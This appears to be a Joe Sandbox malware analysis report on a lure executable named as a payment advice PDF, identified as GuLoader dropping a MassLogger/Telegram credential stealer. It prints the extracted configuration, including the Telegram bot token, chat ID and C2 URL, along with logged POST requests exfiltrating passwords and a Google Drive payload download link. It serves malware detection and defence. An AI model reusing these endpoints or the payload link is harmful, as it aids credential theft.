Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PAYMENT ADVICE 750013-1012449943-81347-pdf.exe

Overview

General Information

Sample name:PAYMENT ADVICE 750013-1012449943-81347-pdf.exe
Analysis ID:1578318
MD5:d0074edab5cee4b432bf2e9f075e6301
SHA1:71a829b476596ad54566c823499b1bfdfa86ae3e
SHA256:0ff51f1bfcef0cabf76af8a2c9bb5c01aef4940a97c9b5cebe83cddf62d5be77
Tags:exeuser-lowmal3
Infos:

Detection

GuLoader, MassLogger RAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected MassLogger RAT
Yara detected Telegram RAT
AI detected suspicious sample
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Initial sample is a PE file and has a suspicious name
Sample has a suspicious name (potential lure to open the executable)
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
{"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
SourceRuleDescriptionAuthorStrings
00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_MassLoggerYara detected MassLogger RATJoe Security
    00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
        00000000.00000002.2073192363.0000000003E37000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
          00000004.00000002.2998753015.0000000002C17000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 3 entries
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T15:29:05.354142+010020577441Malware Command and Control Activity Detected192.168.2.449753149.154.167.220443TCP
            2024-12-19T15:29:08.983430+010020577441Malware Command and Control Activity Detected192.168.2.449763149.154.167.220443TCP
            2024-12-19T15:29:12.557136+010020577441Malware Command and Control Activity Detected192.168.2.449775149.154.167.220443TCP
            2024-12-19T15:29:15.994860+010020577441Malware Command and Control Activity Detected192.168.2.449783149.154.167.220443TCP
            2024-12-19T15:29:19.388638+010020577441Malware Command and Control Activity Detected192.168.2.449794149.154.167.220443TCP
            2024-12-19T15:29:22.830321+010020577441Malware Command and Control Activity Detected192.168.2.449805149.154.167.220443TCP
            2024-12-19T15:29:26.346873+010020577441Malware Command and Control Activity Detected192.168.2.449812149.154.167.220443TCP
            2024-12-19T15:29:29.893929+010020577441Malware Command and Control Activity Detected192.168.2.449823149.154.167.220443TCP
            2024-12-19T15:29:34.009806+010020577441Malware Command and Control Activity Detected192.168.2.449833149.154.167.220443TCP
            2024-12-19T15:29:37.524024+010020577441Malware Command and Control Activity Detected192.168.2.449842149.154.167.220443TCP
            2024-12-19T15:29:40.967355+010020577441Malware Command and Control Activity Detected192.168.2.449852149.154.167.220443TCP
            2024-12-19T15:29:44.560481+010020577441Malware Command and Control Activity Detected192.168.2.449861149.154.167.220443TCP
            2024-12-19T15:29:47.965291+010020577441Malware Command and Control Activity Detected192.168.2.449871149.154.167.220443TCP
            2024-12-19T15:29:51.449518+010020577441Malware Command and Control Activity Detected192.168.2.449881149.154.167.220443TCP
            2024-12-19T15:29:54.981785+010020577441Malware Command and Control Activity Detected192.168.2.449890149.154.167.220443TCP
            2024-12-19T15:29:58.386641+010020577441Malware Command and Control Activity Detected192.168.2.449899149.154.167.220443TCP
            2024-12-19T15:30:02.640506+010020577441Malware Command and Control Activity Detected192.168.2.449911149.154.167.220443TCP
            2024-12-19T15:30:09.283629+010020577441Malware Command and Control Activity Detected192.168.2.449928149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T15:28:54.921372+010028032742Potentially Bad Traffic192.168.2.449738193.122.6.16880TCP
            2024-12-19T15:29:03.140205+010028032742Potentially Bad Traffic192.168.2.449738193.122.6.16880TCP
            2024-12-19T15:29:06.968372+010028032742Potentially Bad Traffic192.168.2.449761193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2024-12-19T15:28:46.105933+010028032702Potentially Bad Traffic192.168.2.449736172.217.17.46443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000004.00000002.3021658495.0000000034D6A000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: MassLogger {"EXfil Mode": "Telegram", "Telegram Token": "7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc", "Telegram Chatid": "7382809095"}
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exe.7788.4.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendMessage"}
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exeReversingLabs: Detection: 57%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374ED1EC CryptUnprotectData,4_2_374ED1EC
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_374ED9D9 CryptUnprotectData,4_2_374ED9D9
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 172.67.177.134:443 -> 192.168.2.4:49739 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 172.217.17.46:443 -> 192.168.2.4:49736 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.217.17.65:443 -> 192.168.2.4:49737 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
            Source: PAYMENT ADVICE 750013-1012449943-81347-pdf.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405846
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_004027FB FindFirstFileW,0_2_004027FB
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 0_2_00406398 FindFirstFileW,FindClose,0_2_00406398
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_00405846 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,4_2_00405846
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_004027FB FindFirstFileW,4_2_004027FB
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4_2_00406398 FindFirstFileW,FindClose,4_2_00406398
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EC985h4_2_374EC638
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374E1042h4_2_374E0C28
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374E0671h4_2_374E03C4
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374E1042h4_2_374E0F6F
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EEA48h4_2_374EE790
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EE198h4_2_374EDEEF
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EC041h4_2_374EBD88
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374E1042h4_2_374E0C27
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EB791h4_2_374EB4EC
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EE5F0h4_2_374EE347
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EEEA0h4_2_374EEBF7
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EDD40h4_2_374EDA9C
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EBBE9h4_2_374EB944
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EC499h4_2_374EC1F2
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 374EF2F8h4_2_374EF054
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A8882Dh4_2_37A88650
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A891B7h4_2_37A88650
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then push 00000000h4_2_37A8BDF0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A81250h4_2_37A80FA8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A86A68h4_2_37A867C0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A861B8h4_2_37A85F10
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A84218h4_2_37A83F70
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A83968h4_2_37A836C0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A830B8h4_2_37A82E10
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A85908h4_2_37A85660
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A85058h4_2_37A84DB0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A82808h4_2_37A82560
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A81F58h4_2_37A81CB0
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A87770h4_2_37A874C8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A816A8h4_2_37A81400
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A86EC0h4_2_37A86C18
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]4_2_37A8CBE7
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A84670h4_2_37A843C8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A83DC0h4_2_37A83B18
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A86610h4_2_37A86368
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_37A87B62
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_37A88373
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A85D60h4_2_37A85AB8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A854B0h4_2_37A85208
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A83510h4_2_37A83268
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A82C60h4_2_37A829B8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h4_2_37A88193
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then push 00000000h4_2_37A8C92F
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A823B0h4_2_37A82108
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A84ACAh4_2_37A84820
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A87318h4_2_37A87070
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then jmp 37A81B00h4_2_37A81858
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then push 00000000h4_2_37FBE7C8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then lea esp, dword ptr [ebp-08h]4_2_37FBF5D8
            Source: C:\Users\user\Desktop\PAYMENT ADVICE 750013-1012449943-81347-pdf.exeCode function: 4x nop then push 00000000h4_2_37FBF316

            Networking

            barindex
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49763 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49794 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49753 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49861 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49833 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49852 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49823 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49805 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49871 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49899 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49911 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49881 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49775 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49842 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49928 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49812 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49783 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 2057744 - Severity 1 - ET MALWARE Snake/Best Private Keylogger CnC Exfil Via Telegram : 192.168.2.4:49890 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd200f92d41c7fHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd203eec4ed598Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2069d581a296Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2095de551f02Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20c046550980Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd20ea6ea465deHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2114582b3447Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd213f5a12c2d3Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2170c0ee4899Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd219b3121eb6eHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd21c40a77b2f8Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd21f0932bd731Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd22273b608eceHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2260236899feHost: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd22a1af022652Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd22ee4aefaa03Host: api.telegram.orgContent-Length: 1090
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd23550c9a6659Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7162915847:AAFcWinWendSJrYL4eRL1FJDDjF3FOU7gZc/sendDocument?chat_id=7382809095&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1Content-Type: multipart/form-data; boundary================8dd2444d970b717Host: api.telegram.orgContent-Length: 1090Connection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49761 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49738 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49736 -> 172.217.17.46:443
            Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Host: drive.google.comCache-Control: no-cache
            Source: global trafficHTTP traffic detected: GET /download?id=1fnXDCYK5NFcR9mHvOBTCauQ_E-GuNG2L&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
